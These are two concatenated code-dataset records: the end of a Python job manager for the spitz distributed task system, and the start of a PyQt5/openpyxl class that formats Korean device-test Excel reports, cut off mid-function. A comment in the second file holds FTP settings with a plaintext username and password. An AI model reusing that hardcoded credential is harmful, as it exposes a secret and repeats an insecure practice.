tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n finally:\n tm.Close()\n\n\n###############################################################################\n# Job Manager routine\n###############################################################################\ndef jobmanager(argv, job, runid, jm, tasklist, completed):\n logging.info('Job manager running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Store some metadata\n submissions = [] # (taskid, submission time, [sent to])\n\n # Task generation loop\n\n taskid = 0\n task = None\n finished = False\n\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pushing(tm):\n finished = False\n else:\n logging.debug('Pushing tasks to %s:%d...', tm.address, tm.port)\n\n # Task pushing loop\n memstat.stats()\n finished, taskid, task, sent = push_tasks(job, runid, jm,\n tm, taskid, task, tasklist, completed[0] == 1)\n\n # Add the sent tasks to the sumission list\n submissions = submissions + sent\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pushing tasks to %s:%d.',\n tm.address, tm.port)\n\n if finished and completed[0] == 0:\n # Tell everyone the task generation was completed\n logging.info('All tasks generated.')\n completed[0] = 1\n\n # Exit the job manager when done\n if len(tasklist) == 0 and completed[0] == 1:\n logging.debug('Job manager exiting...')\n return\n\n # Keep sending the uncommitted tasks\n # TODO: WARNING this will flood the system\n # with repeated tasks\n if finished and len(tasklist) > 0:\n if len(submissions) == 0:\n logging.critical('The submission list is empty but '\n 'the task list is not! Some tasks were lost!')\n\n # Select the oldest task that is not already completed\n while True:\n taskid, task = submissions.pop(0)\n if taskid in tasklist:\n break\n\n # Remove the committed tasks from the submission list\n submissions = [x for x in submissions if x[0] in tasklist]\n\n time.sleep(jm_send_backoff)\n\n###############################################################################\n# Committer routine\n###############################################################################\ndef committer(argv, job, runid, co, tasklist, completed):\n logging.info('Committer running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Result pulling loop\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pulling(tm):\n continue\n\n logging.debug('Pulling tasks from %s:%d...', tm.address, tm.port)\n\n # Task pulling loop\n commit_tasks(job, runid, co, tm, tasklist, completed)\n memstat.stats()\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pulling tasks from %s:%d.',\n tm.address, tm.port)\n\n if len(tasklist) == 0 and completed[0] == 1:\n logging.info('All tasks committed.')\n logging.debug('Committer exiting...')\n return\n\n # Refresh the tasklist\n for taskid in completed:\n tasklist.pop(taskid, 0)\n\n time.sleep(jm_recv_backoff)\n\n###############################################################################\n# Kill all task managers\n###############################################################################\ndef killtms():\n logging.info('Killing task managers...')\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n for name, tm in tmlist.items():\n try:\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n tm.Open(jm_conn_timeout)\n\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Read back the job id of the answer\n tm.ReadString(jm_recv_timeout)\n\n tm.WriteInt64(messaging.msg_terminate)\n tm.Close()\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n###############################################################################\n# Run routine\n###############################################################################\ndef run(argv, jobinfo, job, runid):\n # List of pending tasks\n memstat.stats()\n tasklist = {}\n\n # Keep an extra list of completed tasks\n completed = {0: 0}\n\n # Start the job manager\n logging.info('Starting job manager jor job %d...', runid)\n\n # Create the job manager from the job module\n jm = job.spits_job_manager_new(argv, jobinfo)\n\n jmthread = threading.Thread(target=jobmanager,\n args=(argv, job, runid, jm, tasklist, completed))\n jmthread.start()\n\n # Start the committer\n logging.info('Starting committer for job %d...', runid)\n\n # Create the job manager from the job module\n co = job.spits_committer_new(argv, jobinfo)\n\n cothread = threading.Thread(target=committer,\n args=(argv, job, runid, co, tasklist, completed))\n cothread.start()\n\n # Wait for both threads\n jmthread.join()\n cothread.join()\n\n # Commit the job\n logging.info('Committing Job...')\n r, res, ctx = job.spits_committer_commit_job(co, 0x12345678)\n logging.debug('Job committed.')\n\n # Finalize the job manager\n logging.debug('Finalizing Job Manager...')\n job.spits_job_manager_finalize(jm)\n\n # Finalize the committer\n logging.debug('Finalizing Committer...')\n job.spits_committer_finalize(co)\n memstat.stats()\n\n if res == None:\n logging.error('Job did not push any result!')\n return messaging.res_module_noans, None\n\n if ctx != 0x12345678:\n logging.error('Context verification failed for job!')\n return messaging.res_module_ctxer, None\n\n logging.debug('Job %d finished successfully.', runid)\n return r, res[0]\n\n###############################################################################\n# Main routine\n###############################################################################\ndef main(argv):\n # Print usage\n if len(argv) <= 1:\n abort('USAGE: jm module [module args]')\n\n # Parse the arguments\n args = Args.Args(argv[1:])\n parse_global_config(args.args)\n\n # Setup logging\n setup_log()\n logging.debug('Hello!')\n\n # Enable memory debugging\n if jm_memstat == 1:\n memstat.enable()\n memstat.stats()\n\n # Enable perf module\n if jm_profiling:\n PerfModule(make_uid(), 0, jm_perf_rinterv, jm_perf_subsamp)\n\n # Load the module\n module = args.margs[0]\n job = JobBinary(module)\n\n # Remove JM arguments when passing to the module\n margv = args.margs\n\n # Keep a run identifier\n runid = [0]\n\n # Wrapper to include job module\n def run_wrapper(argv, jobinfo):\n runid[0] = runid[0] + 1\n return run(argv, jobinfo, job, runid[0])\n\n # Wrapper for the heartbeat\n finished = [False]\n def heartbeat_wrapper():\n heartbeat(finished)\n\n # Start the heartbeat\n threading.Thread(target=heartbeat_wrapper).start()\n\n # Run the module\n logging.info('Running module')\n memstat.stats()\n r = job.spits_main(margv, run_wrapper)\n memstat.stats()\n\n # Stop the heartbeat thread\n finished[0] = True\n\n # Kill the workers\n if jm_killtms:\n killtms()\n\n # Print final memory report\n memstat.stats()\n\n # Finalize\n logging.debug('Bye!')\n #exit(r)\n\n###############################################################################\n# Entry point\n###############################################################################\nif __name__ == '__main__':\n main(sys.argv)\n", "sub_path": "spitz-python/jm.py", "file_name": "jm.py", "file_ext": "py", "file_size_in_byte": 31433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.INFO", "line_number": 79, "usage_type": "attribute"}, {"api_name": "libspitz.config.heart_timeout", "line_number": 80, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 80, "usage_type": "name"}, {"api_name": "libspitz.config.conn_timeout", "line_number": 81, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 81, "usage_type": "name"}, {"api_name": "libspitz.config.recv_timeout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 82, "usage_type": "name"}, {"api_name": "libspitz.config.send_timeout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 83, "usage_type": "name"}, {"api_name": "libspitz.config.recv_backoff", "line_number": 84, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 84, "usage_type": "name"}, {"api_name": "libspitz.config.send_backoff", "line_number": 85, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 103, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 104, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 105, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 126, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 145, "usage_type": "call"}, {"api_name": "libspitz.SimpleEndpoint", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 182, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 189, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 215, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 227, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 253, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 255, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 255, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 255, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_send_task", "line_number": 263, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 263, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 269, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 277, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 277, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 279, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 282, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 282, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 292, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 294, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 310, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 312, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 312, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 312, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 320, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 320, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 326, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 335, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 337, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 337, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 337, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 365, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 369, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 378, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 382, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 396, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 396, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 402, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 402, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_rjct", "line_number": 408, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 408, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 412, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 418, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 423, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 424, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 424, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 424, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_empty", "line_number": 440, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 440, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 453, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 453, "usage_type": "name"}, {"api_name": "libspitz.messaging.res_module_error", "line_number": 460, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 460, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 461, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 464, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 468, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 473, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 485, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 498, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 504, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 515, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 543, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 547, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 559, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 562, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 565, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 569, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 577, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 579, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 579, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 579, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 590, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_heart", "line_number": 596, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 596, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 598, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 600, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 600, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 600, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 609, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 610, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 610, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 632, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 635, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 638, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 645, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 648, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 648, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 658, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 663, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 668, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 676, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 688, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 694, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 695, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 695, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 709, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 712, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 715, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 722, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 726, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 726, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 731, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 735, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 736, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 743, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 749, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 756, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_terminate", "line_number": 766, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 766, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 770, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 772, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 772, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 772, "usage_type": "attribute"}, {"api_name": "libspitz.memstat.stats", "line_number": 779, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 779, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 786, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 791, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 796, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 801, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 810, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 812, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 815, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 819, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 821, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 821, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 824, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_noans", "line_number": 825, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 825, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 828, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_ctxer", "line_number": 829, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 829, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 831, "usage_type": "call"}, {"api_name": "Args.Args", "line_number": 843, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 848, "usage_type": "call"}, {"api_name": "libspitz.memstat.enable", "line_number": 852, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 852, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 853, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 853, "usage_type": "name"}, {"api_name": "libspitz.PerfModule", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.make_uid", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.JobBinary", "line_number": 861, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 880, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 883, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 884, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 884, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 886, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 886, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 896, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 896, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 899, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 906, "usage_type": "attribute"}]}
+{"seq_id": "285717113", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thr Oct 18 14:25:12 2019\n@author: TestEnC hanrim lee\n\n\"\"\"\nimport os\nimport sys\nimport re\nimport openpyxl\n# import pkg_resources.py2_warn\nfrom os.path import expanduser\nimport threading\n\n#from konlpy.tag import Komoran\nfrom time import sleep\nfrom datetime import datetime\n\n#import pytagcloud\nfrom PyQt5.QtCore import QThread, pyqtSignal\n#selenium library\nfrom openpyxl.styles import Alignment, Font, NamedStyle, PatternFill\nfrom openpyxl import formatting, styles, Workbook\nfrom openpyxl.styles.borders import Border, Side\n\nclass Formater(QThread):\n\n print_flag = pyqtSignal(str)\n end_flag = pyqtSignal()\n fileCheck_flag = pyqtSignal()\n progress_flag = pyqtSignal()\n count_flag = pyqtSignal()\n dict_result = None\n tot_count = 0\n\n def __init__(self, filePath, opFlag, modeFlag, parent=None):\n QThread.__init__(self, parent)\n\n self.file_names = filePath\n self.list_files = self.file_names.split(\",\")\n self.list_out_files = []\n self.dict_out = {}\n self.dict_readData = {}\n # self.list_sheet_names = []\n\n self.opFlag = opFlag\n self.modeFlag = modeFlag\n self.home = expanduser(\"~\")\n\n self.end_count = \"n\"\n self.totalRows = 0\n self.currentRow = 0\n self.current_path = os.getcwd()\n self.battery_spec = 0.0\n\n # style fill pattern\n # FF0000 red\n # 0000FF blue\n\n self.brown_fill = PatternFill(start_color='DDD9C4', end_color='DDD9C4', fill_type='solid')\n self.light_brown_fill = PatternFill(start_color='EEECE1', end_color='EEECE1', fill_type='solid')\n self.gray_fill = PatternFill(start_color='E7E6E6', end_color='E7E6E6', fill_type='solid')\n self.dark_gray_fill = PatternFill(start_color='D9D9D9', end_color='D9D9D9', fill_type='solid')\n self.light_gray_fill = PatternFill(start_color='F2F2F2', end_color='F2F2F2', fill_type='solid')\n self.apricot_fill = PatternFill(start_color='FDE9D9', end_color='FDE9D9', fill_type='solid')\n self.skyBlue_fill = PatternFill(start_color='DCE6F1', end_color='DCE6F1', fill_type='solid')\n self.yellow_fill = PatternFill(start_color='FFFF00', end_color='FFFF00', fill_type='solid')\n self.orange_fill = PatternFill(start_color='FFC000', end_color='FFC000', fill_type='solid')\n\n # style font color and size\n self.top_font = Font(name='맑은 고딕', size=12, bold=True, color='2B2B2B')\n self.index_font = Font(name='맑은 고딕', size=11, bold=True, color='2B2B2B')\n self.value_font = Font(name='맑은 고딕', size=11, bold=False, color='2B2B2B')\n self.value2_font = Font(name='맑은 고딕', size=10, bold=True, color='2B2B2B')\n self.f2_value_font = Font(name='맑은 고딕', size=10, bold=False, color='2B2B2B')\n self.f2_blue_font = Font(name='맑은 고딕', size=10, bold=False, color='0000FF')\n self.f2_red_font = Font(name='맑은 고딕', size=10, bold=False, color='FF0000')\n\n # style Alignment\n self.general_alignment = Alignment(wrap_text=True, horizontal=\"center\", vertical=\"center\")\n self.top_alignment = Alignment(wrap_text=False, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_2 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_3 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"top\")\n\n # style border\n self.thin_border = Border(left=Side(style='thin'), right=Side(style='thin'), top=Side(style='thin'), bottom=Side(style='thin'))\n\n # ftp 관련 변수 및 설정\n # self.hostname = '192.168.0.108'\n # self.port = 21\n # self.username = 'voc'\n # self.password = 'testenc@01'\n\n # 분석 처리 개수 체크 함수\n def getCountRows(self):\n\n while True:\n if self.end_count is \"n\":\n sleep(0.5)\n self.count_flag.emit()\n else:\n break\n\n # 로그 문자 처리 함수\n def setPrintText(self, text):\n\n strToday = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n text = self.find_between(text, \"/s\", \"/e\")\n print_text = strToday+\":\\n\"+text+\"\\n\"\n self.print_flag.emit(\"{}\".format(print_text))\n\n # 쓰레드 종료 함수\n def stop(self):\n sleep(0.5)\n self.terminate()\n\n # 특수 문자 제거 함수\n def removeString(self, text):\n\n tempText = re.sub('[-=+,#/\\?^$@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>\\{\\}`><]\\'', '', text)\n return tempText\n\n # 문장 앞 부터 조건에 맞는 문자열 substring\n def find_between(self, s, first, last):\n try:\n returnData = \"\"\n start = s.index(first)+len(first)\n end = s.index(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # 문장 뒤 부터 조건에 맞는 문자열 substring\n def find_between_r(self, s, first, last ):\n try:\n returnData = \"\"\n start = s.rindex(first)+len(first)\n end = s.rindex(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # float num check a point\n def check_num(self, num):\n\n return_data = None\n if num is None or num == '':\n return_data = '-'\n else:\n try:\n return_data = '%.2f'%float(num)\n except:\n return_data = str(num)\n\n return return_data\n\n # check calculate comparison\n def cal_comparison(self, standard, measure):\n\n return_data = None\n try:\n return_data = self.check_num(abs(round(abs(float(measure)) - float(standard), 2)))\n except:\n return_data = '-'\n\n return return_data\n\n # check convert num available\n def isNumber(self, string_data):\n\n try:\n temp_data = float(string_data)\n return True\n except:\n return False\n\n # check convert num available\n def check_empty(self, string_data):\n\n return_data = None\n if string_data is None or string_data == '' or string_data.lower() in ['n/a', 'na', 'nt', 'n/t']:\n return_data = '-'\n else:\n return_data = str(string_data)\n\n return return_data\n\n # summary Tab\n def summary_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = {}\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['Summary']\n temp_data['팻네임 / 모델명'] = sheet_in['C5'].value\n temp_data['OS 및 Binary Version'] = sheet_in['C8'].value + \"/\" + sheet_in['C6'].value\n temp_data['Chipset (AP / CP)'] = sheet_in['K6'].value\n temp_data['가로 폭 (mm) / Display Size (inch)'] = sheet_in['K7'].value\n temp_data['배터리 용량 (mAh)'] = str(sheet_in['K8'].value)+'mAh'\n self.battery_spec = float(sheet_in['K8'].value)\n temp_data['검증 차수'] = sheet_in['C9'].value\n temp_data['검증 기간'] = sheet_in['K5'].value\n\n #option setting wb.output\n sheet_out = wb_output['검증결과요약']\n # sheet row 3 handle\n sheet_out.merge_cells('B3:C3')\n sheet_out['B3'] = \"1. 단말 기본 정보\"\n # sheet row 4 handle\n sheet_out.merge_cells('B4:C4')\n sheet_out.merge_cells('D4:E4')\n sheet_out['B4'] = \"팻네임 / 모델명\"\n sheet_out['D4'] = temp_data['팻네임 / 모델명']\n # sheet row 5 handle\n sheet_out.merge_cells('B5:C5')\n sheet_out.merge_cells('D5:E5')\n sheet_out['B5'] = \"OS 및 Binary Version\"\n sheet_out['D5'] = temp_data['OS 및 Binary Version']\n # sheet row 6 handle\n sheet_out.merge_cells('B6:C6')\n sheet_out.merge_cells('D6:E6')\n sheet_out['B6'] = \"Chipset (AP / CP)\"\n sheet_out['D6'] = temp_data['Chipset (AP / CP)']\n # sheet row 7 handle\n sheet_out.merge_cells('B7:C7')\n sheet_out.merge_cells('D7:E7')\n sheet_out['B7'] = \"가로 폭 (mm) / Display Size (inch)\"\n sheet_out['D7'] = temp_data['가로 폭 (mm) / Display Size (inch)']\n # sheet row 7 handle\n sheet_out.merge_cells('B8:C8')\n sheet_out.merge_cells('D8:E8')\n sheet_out['B8'] = \"배터리 용량 (mAh)\"\n sheet_out['D8'] = temp_data['배터리 용량 (mAh)']\n # sheet row 10 handle\n sheet_out.merge_cells('B10:C10')\n sheet_out['B10'] = \"2. 검증 차수 및 검증 기간\"\n # sheet row 11 handle\n sheet_out.merge_cells('B11:C11')\n sheet_out.merge_cells('D11:E11')\n sheet_out['B11'] = \"검증 차수\"\n sheet_out['D11'] = temp_data['검증 차수']\n # sheet row 12 handle\n sheet_out.merge_cells('B12:C12')\n sheet_out.merge_cells('D12:E12')\n sheet_out['B12'] = \"검증 기간\"\n sheet_out['D12'] = temp_data['검증 기간']\n # sheet row 14 handle\n sheet_out.merge_cells('B14:D14')\n sheet_out['B14'] = '3. 검증 결과 (항목수 : 00, Test Case 수 : 78)'\n # sheet row 15 handle\n sheet_out.merge_cells('B15:C15')\n sheet_out['B15'] = '항목'\n sheet_out['D15'] = 'Pass'\n sheet_out['E15'] = 'Fail'\n # sheet row 16 handle\n sheet_out.merge_cells('B16:B19')\n sheet_out['B16'] = 'RF성능'\n sheet_out['C16'] = 'TRP'\n # sheet row 17 handle\n sheet_out['C17'] = 'TIS'\n # sheet row 18 handle\n sheet_out['C18'] = '속도'\n # sheet row 19 handle\n sheet_out['C19'] = 'Call Setup Test'\n # sheet row 20 handle\n sheet_out.merge_cells('B20:C20')\n sheet_out['B20'] = 'MOS'\n # sheet row 21 handle\n sheet_out.merge_cells('B21:C21')\n sheet_out['B21'] = '배터리소모전류 (시간)'\n # sheet row 22 handle\n sheet_out.merge_cells('B22:C22')\n sheet_out['B22'] = '주파수동조'\n # sheet row 23 handle\n sheet_out.merge_cells('B23:C23')\n sheet_out['B23'] = '발열'\n sheet_out['D23'] = ''\n sheet_out['E23'] = ''\n # sheet row 24 handle\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '소계'\n sheet_out['D24'] = ''\n sheet_out['E24'] = ''\n # sheet row 25 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out.merge_cells('D25:E25')\n sheet_out['B25'] = '점수 (가/감점)'\n sheet_out['D25'] = '86.9(+12)'\n # sheet row 26 handle\n sheet_out.merge_cells('B26:C26')\n sheet_out.merge_cells('D26:E26')\n sheet_out['B26'] = '배터리소모전류 (DOU, Test case : 35)'\n sheet_out['D26'] = '1.44일'\n\n # sheet row 26 handle\n sheet_out.merge_cells('B28:E28')\n sheet_out.merge_cells('B29:E29')\n sheet_out['B28'] = '4. 특이사항'\n sheet_out['B29'] = ''\n\n self.setPrintText('/s {}번 파일 \"검증결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B3:E26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n for 